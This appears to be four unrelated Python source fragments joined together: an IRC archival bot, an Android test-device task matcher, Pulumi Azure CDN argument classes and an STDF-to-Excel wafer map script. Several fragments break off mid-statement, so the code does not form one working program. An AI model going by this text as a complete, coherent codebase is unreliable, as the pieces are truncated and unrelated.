def prettyBytes (b):
"""
Pretty-print bytes
"""
prefixes = ['B', 'KiB', 'MiB', 'GiB', 'TiB']
while b >= 1024 and len (prefixes) > 1:
b /= 1024
prefixes.pop (0)
return f'{b:.1f} {prefixes[0]}'
def isValidUrl (s):
url = urlsplit (s)
if url.scheme and url.netloc and url.scheme in {'http', 'https'}:
return s
raise TypeError ()
class NonExitingArgumentParser (argparse.ArgumentParser):
""" Argument parser that does not call exit(), suitable for interactive use """
def exit (self, status=0, message=None):
# should never be called
pass
def error (self, message):
# if we use subparsers it’s important to return self, so we can show
# the correct help
raise Exception (self, message)
def format_usage (self):
return super().format_usage ().replace ('\n', ' ')
class Status(IntEnum):
""" Job status """
undefined = 0
pending = 1
running = 2
aborted = 3
finished = 4
# see https://arxiv.org/html/0901.4016 on how to build proquints (human
# pronouncable unique ids)
toConsonant = 'bdfghjklmnprstvz'
toVowel = 'aiou'
def u16ToQuint (v):
""" Transform a 16 bit unsigned integer into a single quint """
assert 0 <= v < 2**16
# quints are “big-endian”
return ''.join ([
toConsonant[(v>>(4+2+4+2))&0xf],
toVowel[(v>>(4+2+4))&0x3],
toConsonant[(v>>(4+2))&0xf],
toVowel[(v>>4)&0x3],
toConsonant[(v>>0)&0xf],
])
def uintToQuint (v, length=2):
""" Turn any integer into a proquint with fixed length """
assert 0 <= v < 2**(length*16)
return '-'.join (reversed ([u16ToQuint ((v>>(x*16))&0xffff) for x in range (length)]))
def makeJobId ():
""" Create job id from time and randomness source """
# allocate 48 bits for the time (in milliseconds) and add 16 random bits
# at the end (just to be sure) for a total of 64 bits. Should be enough to
# avoid collisions.
randbits = 16
stamp = (int (time.time ()*1000) << randbits) | random.randint (0, 2**randbits-1)
return uintToQuint (stamp, 4)
class Job:
""" Archival job """
__slots__ = ('id', 'stats', 'rstats', 'started', 'finished', 'nick', 'status', 'process', 'url')
def __init__ (self, url, nick):
self.id = makeJobId ()
self.stats = {}
self.rstats = {}
self.started = datetime.utcnow ()
self.finished = None
self.url = url
# user who scheduled this job
self.nick = nick
self.status = Status.pending
self.process = None
def formatStatus (self):
stats = self.stats
rstats = self.rstats
return (f"{self.url} ({self.id}) {self.status.name}. "
f"{rstats.get ('have', 0)} pages finished, "
f"{rstats.get ('pending', 0)} pending; "
f"{stats.get ('crashed', 0)} crashed, "
f"{stats.get ('requests', 0)} requests, "
f"{stats.get ('failed', 0)} failed, "
f"{prettyBytes (stats.get ('bytesRcv', 0))} received.")
@unique
class NickMode(IntEnum):
# the actual numbers don’t matter, but their order must be strictly
# increasing (with priviledge level)
operator = 100
voice = 10
@classmethod
def fromMode (cls, mode):
return {'v': cls.voice, 'o': cls.operator}[mode]
@classmethod
def fromNickPrefix (cls, mode):
return {'@': cls.operator, '+': cls.voice}[mode]
@property
def human (self):
return {self.operator: 'operator', self.voice: 'voice'}[self]
class User:
""" IRC user """
__slots__ = ('name', 'modes')
def __init__ (self, name, modes=None):
self.name = name
self.modes = modes or set ()
def __eq__ (self, b):
return self.name == b.name
def __hash__ (self):
return hash (self.name)
def __repr__ (self):
return f'<User {self.name} {self.modes}>'
def hasPriv (self, p):
if p is None:
return True
else:
return self.modes and max (self.modes) >= p
@classmethod
def fromName (cls, name):
""" Get mode and name from NAMES command """
try:
modes = {NickMode.fromNickPrefix (name[0])}
name = name[1:]
except KeyError:
modes = set ()
return cls (name, modes)
class ReplyContext:
__slots__ = ('client', 'target', 'user')
def __init__ (self, client, target, user):
self.client = client
self.target = target
self.user = user
def __call__ (self, message):
self.client.send ('PRIVMSG', target=self.target,
message=f'{self.user.name}: {message}')
class RefCountEvent:
"""
Ref-counted event that triggers if a) armed and b) refcount drops to zero.
Must be used as a context manager.
"""
__slots__ = ('count', 'event', 'armed')
def __init__ (self):
self.armed = False
self.count = 0
self.event = asyncio.Event ()
def __enter__ (self):
self.count += 1
self.event.clear ()
def __exit__ (self, exc_type, exc_val, exc_tb):
self.count -= 1
if self.armed and self.count == 0:
self.event.set ()
async def wait (self):
await self.event.wait ()
def arm (self):
self.armed = True
if self.count == 0:
self.event.set ()
class ArgparseBot (bottom.Client):
"""
Simple IRC bot using argparse
Tracks user’s modes, reconnects on disconnect
"""
__slots__ = ('channels', 'nick', 'parser', 'users', '_quit')
def __init__ (self, host, port, ssl, nick, logger, channels=None, loop=None):
super().__init__ (host=host, port=port, ssl=ssl, loop=loop)
self.channels = channels or []
self.nick = nick
# map channel -> nick -> user
self.users = defaultdict (dict)
self.logger = logger.bind (context=type (self).__name__)
self.parser = self.getParser ()
# bot does not accept new queries in shutdown mode, unless explicitly
# permitted by the parser
self._quit = RefCountEvent ()
# register bottom event handler
self.on('CLIENT_CONNECT', self.onConnect)
self.on('PING', self.onKeepalive)
self.on('PRIVMSG', self.onMessage)
self.on('CLIENT_DISCONNECT', self.onDisconnect)
self.on('RPL_NAMREPLY', self.onNameReply)
self.on('CHANNELMODE', self.onMode)
self.on('PART', self.onPart)
self.on('JOIN', self.onJoin)
# XXX: we would like to handle KICK, but bottom does not support that at the moment
@abstractmethod
def getParser (self):
pass
def cancel (self):
self.logger.info ('cancel', uuid='1eb34aea-a854-4fec-90b2-7f8a3812a9cd')
self._quit.arm ()
async def run (self):
await self.connect ()
await self._quit.wait ()
self.send ('QUIT', message='Bye.')
await self.disconnect ()
async def onConnect (self, **kwargs):
self.logger.info ('connect', nick=self.nick, uuid='01f7b138-ea53-4609-88e9-61f3eca3e7e7')
self.send('NICK', nick=self.nick)
self.send('USER', user=self.nick, realname='https://github.com/PromyLOPh/crocoite')
# Don't try to join channels until the server has
# sent the MOTD, or signaled that there's no MOTD.
done, pending = await asyncio.wait(
[self.wait('RPL_ENDOFMOTD'), self.wait('ERR_NOMOTD')],
loop=self.loop, return_when=asyncio.FIRST_COMPLETED)
# Cancel whichever waiter's event didn't come in.
for future in pending:
future.cancel()
for c in self.channels:
self.logger.info ('join', channel=c, uuid='367063a5-9069-4025-907c-65ba88af8593')
self.send ('JOIN', channel=c)
# no need for NAMES here, server sends this automatically
async def onNameReply (self, channel, users, **kwargs):
# channels may be too big for a single message
addusers = dict (map (lambda x: (x.name, x), map (User.fromName, users)))
if channel not in self.users:
self.users[channel] = addusers
else:
self.users[channel].update (addusers)
@staticmethod
def parseMode (mode):
""" Parse mode strings like +a, -b, +a-b, -b+a, … """
action = '+'
ret = []
for c in mode:
if c in {'+', '-'}:
action = c
else:
ret.append ((action, c))
return ret
async def onMode (self, channel, modes, params, **kwargs):
if channel not in self.channels:
return
for (action, mode), nick in zip (self.parseMode (modes), params):
try:
m = NickMode.fromMode (mode)
u = self.users[channel].get (nick, User (nick))
if action == '+':
u.modes.add (m)
elif action == '-':
u.modes.remove (m)
except KeyError:
# unknown mode, ignore
pass
async def onPart (self, nick, channel, **kwargs):
if | |
# Lint as: python2, python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command task matcher is used to matcher tasks against a host."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import defaultdict, namedtuple
import logging
import six
from tradefed_cluster import common
_OPERATOR_TO_PREDICTOR = {
'=': lambda a, b: a == b,
'>': lambda a, b: a > b,
'>=': lambda a, b: a >= b,
'<': lambda a, b: a < b,
'<=': lambda a, b: a <= b,
}
Device = namedtuple('Device', ['device_serial', 'run_target', 'attributes'])
RunTarget = namedtuple('RunTarget', ['name', 'group', 'devices'])
Group = namedtuple('Group', ['name', 'run_targets'])
class CommandTaskMatcher(object):
"""CommandTaskMatcher is used to matcher tasks against a host.
go/atp-multiple-device-match-design-doc has more details
about matching algorithm.
"""
def __init__(self, host_info):
"""Create a new CommandTaskMatcher.
Args:
host_info: a HostInfo message.
"""
# A group name to group map. It represents the device tree.
self._groups = self._BuildGroupTrees(host_info.device_infos)
# A run target to {device serial: device} map. It's an index for run target.
self._run_target_index = self._BuildRunTargetIndex(self._groups)
def _BuildGroupTrees(self, devices):
"""Build device trees for groups.
Create a map from group name to group tree and
only contains groups not in use and have available devices.
Args:
devices: a list of DeviceInfo.
Returns:
a group name to group map.
"""
allocated_group = set([])
for d in devices:
if not d.group_name:
# if a device doesn't belong to any group,
# then its serial will be its group name.
d.group_name = d.device_serial
if d.state == common.DeviceState.ALLOCATED:
logging.debug('Group %s is in use.', d.group_name)
allocated_group.add(d.group_name)
group_devices = defaultdict(list)
for d in devices:
if d.group_name in allocated_group:
continue
if d.state != common.DeviceState.AVAILABLE:
continue
group_devices[d.group_name].append(d)
group_map = {}
for group_name, devices in six.iteritems(group_devices):
group = self._BuildGroupSubtree(group_name, devices)
group_map[group_name] = group
return group_map
def _BuildGroupSubtree(self, group_name, devices):
"""Build a group subtree.
The created group tree only includes available devices.
If there is no device availabe under the group,
return None.
Args:
group_name: group name
devices: devices iter under the group
Returns:
a group if the group has available devices, otherwise None
"""
group = Group(name=group_name, run_targets={})
for d in devices:
run_target = group.run_targets.setdefault(
d.run_target,
RunTarget(name=d.run_target, group=group, devices={}))
run_target.devices[d.device_serial] = Device(
device_serial=d.device_serial,
run_target=run_target,
attributes=self._GetDeviceAttributes(d))
if group.run_targets:
return group
return None
def _GetDeviceAttributes(self, device):
"""Get device's attributes.
Args:
device: a message.DeviceInfo.
Returns:
device's attributes that can be used to schedule tests.
"""
# TODO: To start with we only allow limit device attributes
# for scheduling tests, we will make it more flexible later.
attributes = {}
attributes['build_id'] = device.build_id
attributes['device_serial'] = device.device_serial
attributes['hostname'] = device.hostname
attributes['product'] = device.product
attributes['product_variant'] = device.product_variant
attributes['sim_state'] = device.sim_state
attributes['battery_level'] = device.battery_level
return attributes
def _BuildRunTargetIndex(self, groups):
"""Build run target to devices map.
It's like an index from run target to devices.
Args:
groups: a map from group name to Group objects
Returns:
run target to device list
"""
run_target_to_devices = {}
for group in six.itervalues(groups):
for d in self._ListGroupDevices(group):
run_target_to_devices.setdefault(
d.run_target.name, {})[d.device_serial] = d
return run_target_to_devices
def _ListGroupDevices(self, group):
"""Get all devices under a group.
Args:
group: a Group object
Yields:
devices under a group
"""
for run_target in six.itervalues(group.run_targets):
for d in six.itervalues(run_target.devices):
yield d
def Match(self, command_task):
"""Match a command task against.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
if len(command_task.test_bench.host.groups) == 1:
if len(command_task.test_bench.host.groups[0].run_targets) == 1:
# type1 test
return self._MatchType1(command_task)
else:
# type2 test
return self._MatchType2(command_task)
else:
# type3 test
return self._MatchType3(command_task)
def _MatchType1(self, command_task):
"""Match type1 test.
Type1 tests have only one run target.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
run_target = command_task.run_targets[0]
devices = self._run_target_index.get(run_target)
for device in six.itervalues(devices):
if self._MatchDeviceAttributes(
(command_task.test_bench.host.groups[0].run_targets[0]
.device_attributes),
device.attributes):
return [device]
return None
def _MatchDeviceAttributes(self, required_attributes, device_attributes):
"""Check if a device's attributes match the task's requirements.
Args:
required_attributes: a list of datastore_entities.Attribute.
device_attributes: a map of device's attribute name to its value.
Returns:
True if the device meet the requirements, otherwise False.
"""
if not required_attributes:
return True
for required_attribute in required_attributes:
if not _MatchDeviceAttribute(required_attribute, device_attributes):
return False
return True
def _MatchType2(self, command_task):
"""Match type2 test.
type2 tests require multiple devices and
all devices should be under one group.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
for group in six.itervalues(self._groups):
matched_devices = self._MatchGroup(
group, command_task.test_bench.host.groups[0])
if matched_devices:
return matched_devices
return None
def _MatchGroup(self, device_group, group_requirements):
"""Match a device group against a group requirements.
Args:
device_group: the device group
group_requirements: the expect group
Returns:
a list of matched devices
"""
logging.debug('Try to match %s against %s',
group_requirements, device_group.name)
matched_devices = []
matched_device_serials = set()
for run_target_requirement in group_requirements.run_targets:
matched = False
run_target_candidate = device_group.run_targets.get(
run_target_requirement.name)
if not run_target_candidate:
logging.debug('No run target %s.', run_target_requirement.name)
return None
for device_candidate in run_target_candidate.devices.values():
if device_candidate.device_serial in matched_device_serials:
continue
if self._MatchDeviceAttributes(
run_target_requirement.device_attributes,
device_candidate.attributes):
matched_devices.append(device_candidate)
matched_device_serials.add(device_candidate.device_serial)
matched = True
break
if not matched:
logging.debug('There is no match for %s.', run_target_requirement)
return None
logging.debug('%s matches requirement %s with %s.',
device_group.name,
group_requirements,
[d.device_serial for d in matched_devices])
return matched_devices
def _MatchType3(self, command_task):
"""Match type3 test.
type3 tests require multiple devices and
those devices can be under different groups.
Groups are not reentrant.
Args:
command_task: a CommandTask object
Returns:
a list of matched devices
"""
# TODO: Current impl is not smart enough. First, groups are not
# reentrant, when a group is matched by some group requirement, other group
# requirement can not grab this group again.
# Second, assume the task has two group requirements: gr1, gr2, and the host
# has two device groups: dg1, dg2. Assume dg1 and dg2 both fullfill gr1, but
# only dg1 fullfill gr2. There is a possibility that gr1 grabs dg1, gr2
# can not be matched and the whole matching failed. But in fact there is a
# matching dg2->gr1, dg1->gr2.
# This implementation basically only support task that has multiple groups
# but each group has only one run target.
matched_devices = []
allocated_groups = set()
for group_requirement in command_task.test_bench.host.groups:
logging.debug('Matching group %s', group_requirement)
group_matched_devices = None
group = None
for group in six.itervalues(self._groups):
if group.name in allocated_groups:
continue
group_matched_devices = self._MatchGroup(group, group_requirement)
if group_matched_devices:
break
if group_matched_devices and group:
matched_devices.extend(group_matched_devices)
allocated_groups.add(group.name)
else:
# for some group requirement there is no matching in this host.
logging.debug('Failed to match')
return None
return matched_devices
def RemoveDeviceGroups(self, devices):
"""Remove the devices' groups in the host.
The devices must exist in the device tree.
And this method will remove those devices and their groups' devices
from the device tree, since the group is in use.
Args:
devices: a list of devices
"""
for d in devices:
# delete the group from the device tree
group = self._groups.pop(d.run_target.group.name, None)
if not group:
continue
# delete all devices under the group from the _run_target_index
for d_in_group in self._ListGroupDevices(group):
self._run_target_index[d_in_group.run_target.name].pop(
d_in_group.device_serial)
def GetRunTargets(self):
"""Get all run targets in this host.
Returns:
a list of run target names
"""
return list(self._run_target_index.keys())
def IsEmpty(self):
"""The host has usable devices or not.
Returns:
true if the host has no usable devices, otherwise false
"""
return not self._groups
def _MatchDeviceAttribute(required_attr, device_attrs):
"""Check if a device's attributes match the task's requirements."""
if required_attr.name not in device_attrs:
logging.debug(
'No %s in %s.',
required_attr.name, device_attrs.get('device_serial'))
return False
operator = required_attr.operator or '='
if operator not in _OPERATOR_TO_PREDICTOR:
# This should never happen, since we check the expression in
# request_api._ParseAttributeRequirement.
raise ValueError('Operator "%s" is not supported.' % operator)
device_attr_value = device_attrs[required_attr.name]
required_value = required_attr.value
required_attribute_value = | |
is enabled for load balancing or not. By default, origin is always enabled.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="httpPort")
def http_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTP port. Must be between 1 and 65535.
"""
return pulumi.get(self, "http_port")
@http_port.setter
def http_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "http_port", value)
@property
@pulumi.getter(name="httpsPort")
def https_port(self) -> Optional[pulumi.Input[int]]:
"""
The value of the HTTPS port. Must be between 1 and 65535.
"""
return pulumi.get(self, "https_port")
@https_port.setter
def https_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "https_port", value)
@property
@pulumi.getter(name="originHostHeader")
def origin_host_header(self) -> Optional[pulumi.Input[str]]:
"""
The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
"""
return pulumi.get(self, "origin_host_header")
@origin_host_header.setter
def origin_host_header(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "origin_host_header", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
Priority of origin in given origin group for load balancing. Higher priorities will not be used for load balancing if any lower priority origin is healthy.Must be between 1 and 5.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="privateLinkAlias")
def private_link_alias(self) -> Optional[pulumi.Input[str]]:
"""
The Alias of the Private Link resource. Populating this optional field indicates that this origin is 'Private'
"""
return pulumi.get(self, "private_link_alias")
@private_link_alias.setter
def private_link_alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_alias", value)
@property
@pulumi.getter(name="privateLinkApprovalMessage")
def private_link_approval_message(self) -> Optional[pulumi.Input[str]]:
"""
A custom message to be included in the approval request to connect to the Private Link.
"""
return pulumi.get(self, "private_link_approval_message")
@private_link_approval_message.setter
def private_link_approval_message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_approval_message", value)
@property
@pulumi.getter(name="privateLinkLocation")
def private_link_location(self) -> Optional[pulumi.Input[str]]:
"""
The location of the Private Link resource. Required only if 'privateLinkResourceId' is populated
"""
return pulumi.get(self, "private_link_location")
@private_link_location.setter
def private_link_location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_location", value)
@property
@pulumi.getter(name="privateLinkResourceId")
def private_link_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The Resource Id of the Private Link resource. Populating this optional field indicates that this backend is 'Private'
"""
return pulumi.get(self, "private_link_resource_id")
@private_link_resource_id.setter
def private_link_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_link_resource_id", value)
@property
@pulumi.getter
def weight(self) -> Optional[pulumi.Input[int]]:
"""
Weight of the origin in given origin group for load balancing. Must be between 1 and 1000
"""
return pulumi.get(self, "weight")
@weight.setter
def weight(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "weight", value)
@pulumi.input_type
class DeliveryRuleCacheExpirationActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheExpirationActionParametersArgs']):
"""
Defines the cache expiration action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
:param pulumi.Input['CacheExpirationActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheExpiration')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheExpiration'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheExpirationActionParametersArgs']:
"""
Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheExpirationActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleCacheKeyQueryStringActionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CacheKeyQueryStringActionParametersArgs']):
"""
Defines the cache-key query string action for the delivery rule.
:param pulumi.Input[str] name: The name of the action for the delivery rule.
Expected value is 'CacheKeyQueryString'.
:param pulumi.Input['CacheKeyQueryStringActionParametersArgs'] parameters: Defines the parameters for the action.
"""
pulumi.set(__self__, "name", 'CacheKeyQueryString')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the action for the delivery rule.
Expected value is 'CacheKeyQueryString'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CacheKeyQueryStringActionParametersArgs']:
"""
Defines the parameters for the action.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CacheKeyQueryStringActionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleCookiesConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['CookiesMatchConditionParametersArgs']):
"""
Defines the Cookies condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'Cookies'.
:param pulumi.Input['CookiesMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'Cookies')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'Cookies'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['CookiesMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['CookiesMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleHttpVersionConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['HttpVersionMatchConditionParametersArgs']):
"""
Defines the HttpVersion condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'HttpVersion'.
:param pulumi.Input['HttpVersionMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'HttpVersion')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'HttpVersion'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['HttpVersionMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['HttpVersionMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleIsDeviceConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['IsDeviceMatchConditionParametersArgs']):
"""
Defines the IsDevice condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'IsDevice'.
:param pulumi.Input['IsDeviceMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'IsDevice')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'IsDevice'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['IsDeviceMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['IsDeviceMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRulePostArgsConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['PostArgsMatchConditionParametersArgs']):
"""
Defines the PostArgs condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'PostArgs'.
:param pulumi.Input['PostArgsMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'PostArgs')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'PostArgs'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['PostArgsMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['PostArgsMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleQueryStringConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['QueryStringMatchConditionParametersArgs']):
"""
Defines the QueryString condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'QueryString'.
:param pulumi.Input['QueryStringMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'QueryString')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'QueryString'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['QueryStringMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['QueryStringMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleRemoteAddressConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['RemoteAddressMatchConditionParametersArgs']):
"""
Defines the RemoteAddress condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'RemoteAddress'.
:param pulumi.Input['RemoteAddressMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'RemoteAddress')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the condition for the delivery rule.
Expected value is 'RemoteAddress'.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> pulumi.Input['RemoteAddressMatchConditionParametersArgs']:
"""
Defines the parameters for the condition.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: pulumi.Input['RemoteAddressMatchConditionParametersArgs']):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class DeliveryRuleRequestBodyConditionArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
parameters: pulumi.Input['RequestBodyMatchConditionParametersArgs']):
"""
Defines the RequestBody condition for the delivery rule.
:param pulumi.Input[str] name: The name of the condition for the delivery rule.
Expected value is 'RequestBody'.
:param pulumi.Input['RequestBodyMatchConditionParametersArgs'] parameters: Defines the parameters for the condition.
"""
pulumi.set(__self__, "name", 'RequestBody')
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
| |
<filename>Mstdfxmltoxlsx2map.py
"""
The MIT License (MIT)
Copyright (c) 2020 <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Developed by <EMAIL> in 2020
"""
from openpyxl.utils import get_column_letter
from openpyxl.styles import Font, PatternFill, Side, Border
from openpyxl import Workbook
import re
import time
timerstart = time.time()
XMLfilename = input('Input xml (of STDF) here, its filename (not zipped) should be file.xml: ')
frd = open(XMLfilename, mode='r', encoding='utf-8')
filename = re.search('(.*).xml', XMLfilename)
XLSXfilename = filename.group(1) + 'Map.xlsx'
for i in range(0, 50):
line = frd.readline()
if line.startswith('SDR:'):
SDRsite_cnt = re.search('SITE_CNT=(\d+)', line)
SDRsitecnt = int(SDRsite_cnt.group(1))
break
wb = Workbook()
ws1 = wb.active
ws1.title = "AllResult"
xlsxheadrow = 7
xlsxrow = 8
OneWaferdict = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneWaferdictFirst = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneWaferdictRetest = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
OneTDdict = { 'head_num':[], 'site_num':[], 'hard_bin':[], 'soft_bin':[], 'x_coord':[], 'y_coord':[] }
Headerinxlsx = list(OneTDdict.keys())
for k in Headerinxlsx:
for j in range(0, SDRsitecnt):
OneTDdict[k].append('na')
HBRcont = { 'hbin_num':[], 'hbin_pf':[], 'hbin_nam':[] }
Firstcont = { 'hbin_qty':[], 'hbin_yield':[] }
Retestcont = { 'hbin_qty':[], 'hbin_yield':[] }
PCRcont = { 'part_cnt':0, 'rtst_cnt':0 }
PTRLoLimit = {}
PTRHiLimit = {}
MPRLoLimit = {}
MPRHiLimit = {}
PIRindex = 0
PRRindex = 0
while ( line != ''):
line = frd.readline()
if line.startswith('PIR:'):
